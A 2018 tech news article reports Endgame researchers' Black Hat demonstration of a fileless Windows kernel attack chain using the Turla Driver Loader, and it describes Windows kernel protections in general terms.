View all newsletters
Receive our newsletter - data, insights and analysis delivered to you
  1. Technology
  2. Cybersecurity
August 10, 2018updated 13 Aug 2018 12:17pm

Kernel Attack Fully Compromises Windows Machines

Turla Driver Loader is able to bypass Microsoft Windows protections in order to exploit the kernel.

By CBR Staff Writer

Researchers have demonstrated a new attack method able to compromise the kernel in Windows machines.

On Thursday at the Black Hat conference in Las Vegas, researchers from cybersecurity firm Endgame demonstrated how kernel attacks can go beyond standard malware and exploits to fully compromise a Windows machine with a fileless technique.

As reported by Threat Post, during the session “Kernel Mode Threats and Practical Defenses,” senior Endgame researcher Joe Desimone demonstrated how the Turla Driver Loader could be crafted into a full, fileless kernel-mode attack.

The Turla Driver Loader (TDL), available on GitHub, is a driver loader designed to bypass Windows x64 Driver Signature Enforcement protections.

While the security measure is intended to prevent drivers loading without digital signing, according to the developers of TDL, this “ruined many freeware programs” and “didn’t fix anything in the anti-malware field,” leading to the development of the bypass.

Kernel

The component of PC operating systems called the kernel is a critical aspect of today’s machines. The kernel is the central module of an OS and once loaded it stays in memory in order to manage aspects of processes and tasks.

If a threat actor manages to gain access to the kernel they can poke around the critical elements of an OS and perform actions which otherwise would be forbidden.

Content from our partners
How businesses can safeguard themselves on the cyber frontline
How hackers’ tactics are evolving in an increasingly complex landscape
Green for go: Transforming trade in the UK

As a result PC vendors, including Microsoft, spend a vast amount of resources in order to protect the kernel.

The Redmond giant has a number of protections in place, such as Kernel Patch Protection (KPP) which prevents the kernel from being patched, Driver Signature Enforcement — which only allows drivers to be loaded which have been signed off by Microsoft — and Secure Boot, which is meant to stop software other than that provided by the Original Equipment Manufacturer (OEM) from booting.

However, cyberattackers are constantly seeking new ways to compromise the kernel through malware and new attack techniques.

TDL was not crafted as a tool for threat actors, and yet, the public code can be used for a full compromise of Windows systems and the exfiltration of data.

Endgame researchers demonstrated how TDL can be used as part of an exploit chain. Hacking tools Squiblydoo/Squiblytwo and DotNetToJS can be used to execute arbitrary .NET code which maps TDL into memory without touching the disk and setting off Windows protections or antivirus software.

Once loaded into memory, TDL can exploit a signed driver and push malicious code into the kernel.

The researchers say they do not know of any other teams which have created the same exploit chain for kernel compromise.

Speaking to Threat Post Gabriel Landau Endgame researcher said:“We’re able to get full access on the machines in a very stealthy way.”

In response to such attacks, Microsoft recently launched Virtualization Based Security (VBS) which sandboxes the kernel. However, even this protection isn’t enough as Endgame was also able to circumvent VBS to silently disable antivirus solutions.

See Also: Google Shielded VMs to Protect Cloud Workloads at Hardware Level

At the same time as Endgame was demonstrating how to compromise critical aspects of Windows systems, Microsoft was urging bug bounty hunters to turn their attention to Hyper-V.

 

Websites in our network
Select and enter your corporate email address Tech Monitor's research, insight and analysis examines the frontiers of digital transformation to help tech leaders navigate the future. Our Changelog newsletter delivers our best work to your inbox every week.
  • CIO
  • CTO
  • CISO
  • CSO
  • CFO
  • CDO
  • CEO
  • Architect Founder
  • MD
  • Director
  • Manager
  • Other
Visit our privacy policy for more information about our services, how New Statesman Media Group may use, process and share your personal data, including information on your rights in respect of your personal data and how you can unsubscribe from future marketing communications. Our services are intended for corporate subscribers and you warrant that the email address submitted is your corporate email address.
THANK YOU